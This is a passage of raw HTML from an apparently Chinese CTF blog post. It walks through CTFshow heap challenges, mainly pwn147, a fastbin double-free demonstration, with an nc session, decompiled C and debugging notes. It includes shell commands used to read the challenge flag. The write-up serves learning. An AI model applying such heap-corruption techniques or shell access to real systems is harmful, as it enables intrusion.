lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"324\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-16-1024x324.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-741\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-17-1024x818.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"818\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-17-1024x818.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-742\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u6211\u4eec\u521b\u5efa\u7684\u662f\u90a3\u4e2a\u5927\u5c0f\u4e3a0x30\u7684chunk\uff0c\u6267\u884c\u5b8ccall free<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-18-1024x300.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"300\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-18-1024x300.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-743\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-19-1024x815.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"815\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-19-1024x815.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-744\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u770b\u5230\u6709\u4e00\u4e2afree chunk<\/p>\n\n\n\n<p id=\"u66415ef5\">\u4f46\u662f\u5230\u8fd9\u513f\u7a0b\u5e8f\u6bb5\u9519\u8bef\u4e86\uff0c\u53ea\u80fd\u770b\u770b\u5e08\u5085\u4eec\u7684\u8c03\u8bd5\u4e86<\/p>\n\n\n\n<p>\u63a8\u8350\u6587\u7ae0\uff1a<a href=\"https:\/\/blog.csdn.net\/2502_91269216\/article\/details\/146376715?fromshare=blogdetail&amp;sharetype=blogdetail&amp;sharerId=146376715&amp;sharerefer=PC&amp;sharesource=Yilanchia&amp;sharefrom=from_link\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/blog.csdn.net\/2502_91269216\/article\/details\/146376715?fromshare=blogdetail&amp;sharetype=blogdetail&amp;sharerId=146376715&amp;sharerefer=PC&amp;sharesource=Yilanchia&amp;sharefrom=from_link<\/a><br><\/p>\n\n\n\n<h2 
class=\"wp-block-heading\"><br>3\u3001pwn147<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-20-1024x720.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"720\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-20-1024x720.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-745\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue15ca2b3\">\u63d0\u793a\u662ffastbin_dup<\/p>\n\n\n\n<p id=\"ubf355fa1\">\u6211\u4eec\u6765\u770b\u770bchecksec<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-21-1024x457.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"457\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-21-1024x457.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-746\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 
\/><\/div><\/figure>\n\n\n\n<p><br>\u7136\u540e\u8fd0\u884c\u4e00\u4e0b\u7a0b\u5e8f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>faetong@faetong-virtual-machine:~\/pwnit$ nc pwn.challenge.ctf.show 28225\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : 
https:\/\/ctf.show\/                                       \n    * Hint  : Fastbin_dup -- Double free                              \n    * *************************************                           \n\u6f14\u793a fastbin \u7684 double free\n\u9996\u5148\u7533\u8bf7 3 \u4e2a chunk\n\u7b2c\u4e00\u4e2a malloc(8): 0xd08010\n\u7b2c\u4e8c\u4e2a malloc(8): 0xd08030\n\u7b2c\u4e09\u4e2a malloc(8): 0xd08050\nfree \u6389\u7b2c\u4e00\u4e2a\n\u5f53\u6211\u4eec\u518d\u6b21 free 0xd08010 \u7684\u65f6\u5019, \u7a0b\u5e8f\u5c06\u4f1a\u5d29\u6e83\u56e0\u4e3a 0xd08010 \u5728 free \u94fe\u8868\u7684\u7b2c\u4e00\u4e2a\u4f4d\u7f6e\u4e0a\n\u6211\u4eec\u5148 free 0xd08030.\n\u73b0\u5728\u6211\u4eec\u5c31\u53ef\u4ee5\u518d\u6b21 free 0xd08010 \u4e86, \u56e0\u4e3a\u4ed6\u73b0\u5728\u4e0d\u5728 free \u94fe\u8868\u7684\u7b2c\u4e00\u4e2a\u4f4d\u7f6e\u4e0a\n\u73b0\u5728\u7a7a\u95f2\u94fe\u8868\u662f\u8fd9\u6837\u7684 &#91; 0xd08010, 0xd08030, 0xd08010 ]. \u5982\u679c\u6211\u4eec malloc \u4e09\u6b21, \u6211\u4eec\u4f1a\u5f97\u5230\u4e24\u6b21 0xd08010 \n\u7b2c\u4e00\u6b21 malloc(8): 0xd08010\n\u7b2c\u4e8c\u6b21 malloc(8): 0xd08030\n\u7b2c\u4e09\u6b21 malloc(8): 0xd08010\n$\n<\/code><\/pre>\n\n\n\n<p><br>\u6f14\u793a\u7684\u662ffastbin\u7684double free\uff0c\u5176\u5b9e\u4e4b\u524d\u9047\u5230\u8fc7\uff0c\u901a\u8fc7\u6f14\u793a\uff0cdouble free\u5c31\u53d8\u5f97\u76f4\u89c2\u4e86\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sh\nls\ncat flag<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-22-1024x543.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"543\" 
data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-22-1024x543.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-747\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u6211\u4eec\u6765\u8bd5\u7740\u8c03\u8bd5\u4e00\u4e0b\uff0c\u5148\u770b\u770b\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl demo()\n{\n  char *AAAAAAAA; \/\/ &#91;rsp+0h] &#91;rbp-30h]\n  char *b; \/\/ &#91;rsp+8h] &#91;rbp-28h]\n  char *c; \/\/ &#91;rsp+10h] &#91;rbp-20h]\n  char *d; \/\/ &#91;rsp+18h] &#91;rbp-18h]\n  char *e; \/\/ &#91;rsp+20h] &#91;rbp-10h]\n  char *f; \/\/ &#91;rsp+28h] &#91;rbp-8h]\n\n  fwrite(&amp;ptr_, 1u, 0x1Fu, stderr);\n  fwrite(&amp;ptr__0, 1u, 0x19u, stderr);\n  AAAAAAAA = (char *)malloc(8u);\n  strcpy(AAAAAAAA, \"AAAAAAAA\");\n  b = (char *)malloc(8u);\n  strcpy(b, \"BBBBBBBB\");\n  c = (char *)malloc(8u);\n  strcpy(c, \"CCCCCCCC\");\n  fprintf(stderr, &amp;format_, AAAAAAAA);\n  fprintf(stderr, &amp;format__0, b);\n  fprintf(stderr, &amp;format__1, c);\n  fwrite(&amp;ptr__1, 1u, 0x12u, stderr);\n  free(AAAAAAAA);\n  fprintf(stderr, &amp;format__2, AAAAAAAA, AAAAAAAA);\n  fprintf(stderr, &amp;format__3, b);\n  free(b);\n  fprintf(stderr, &amp;format__4, AAAAAAAA);\n  free(AAAAAAAA);\n  fprintf(stderr, &amp;format__5, AAAAAAAA, b, AAAAAAAA, AAAAAAAA);\n  d = (char *)malloc(8u);\n  e = (char *)malloc(8u);\n  f = (char *)malloc(8u);\n  strcpy(d, \"DDDDDDDD\");\n  strcpy(e, \"EEEEEEEE\");\n  strcpy(f, \"FFFFFFFF\");\n  fprintf(stderr, &amp;format__6, d);\n  fprintf(stderr, &amp;format__7, e);\n  fprintf(stderr, &amp;format__8, f);\n}<\/code><\/pre>\n\n\n\n<p><br>\u6211\u4eec\u8fdb\u5165demo\u8fd9\u4e2a\u51fd\u6570\u8fdb\u884c\u7ec6\u8c03<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-23-1024x402.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"402\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-23-1024x402.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-748\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u6211\u4eec\u8fd0\u884c\u5230call malloc<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-24-1024x355.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"355\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-24-1024x355.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-749\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-25-1024x802.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"802\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-25-1024x802.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-750\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u521b\u5efa\u5b8c\uff08\u4e0b\u9762\u6362\u4e86libc-2.23.so\u548cld-2.23.so\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-26-1024x322.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"322\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-26-1024x322.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-751\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-27-1024x900.png'><img 
class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"900\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-27-1024x900.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-752\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ua0074833\">\u6b64\u65f6\u5206\u914d\u4e863\u4e2achunk<\/p>\n\n\n\n<p id=\"u96f07eb2\">\u63a5\u4e0b\u6765\u662ffree\uff0c\u6ce8\u610f\u89c2\u5bdffastbin<\/p>\n\n\n\n<p id=\"ua2efe745\">\u7b2c\u4e00\u4e2afree\u4e86chunk0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-28-1024x919.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"919\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-28-1024x919.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-753\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1708415b\">\u53ef\u4ee5\u770b\u5230\u5b83\u88ab\u5217\u5165\u4e86fastbin<\/p>\n\n\n\n<p id=\"u892a9a8f\">\u63a5\u4e0b\u6765free chunk1<\/p>\n\n\n\n<figure 
class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-29-1024x1022.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1022\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-29-1024x1022.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-754\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u73b0\u5728\u6211\u4eec\u53ef\u4ee5\u770b\u5230bins\u91cc\u9762\u7684\u60c5\u51b5<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-30-1024x629.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"629\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-30-1024x629.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-755\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ubd49c1cf\">chunk[0]-chunk[1]-chunk[0]<\/p>\n\n\n\n<p 
id=\"u46c7db80\">\u63a5\u4e0b\u6765\u53c8\u628achunk\u7533\u8bf7\u56de\u6765<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-31-1024x517.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"517\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-31-1024x517.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-756\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u73b0\u5728\u6211\u4eec\u8981\u770b\u770b\uff0c\u6211\u4eec\u5199\u5165\u7684\u4e1c\u897f\u662f\u4e0d\u662f\u4f1a\u51fa\u73b0\u5728chunk[0]\u4e2d<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-32-1024x304.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"304\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-32-1024x304.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" 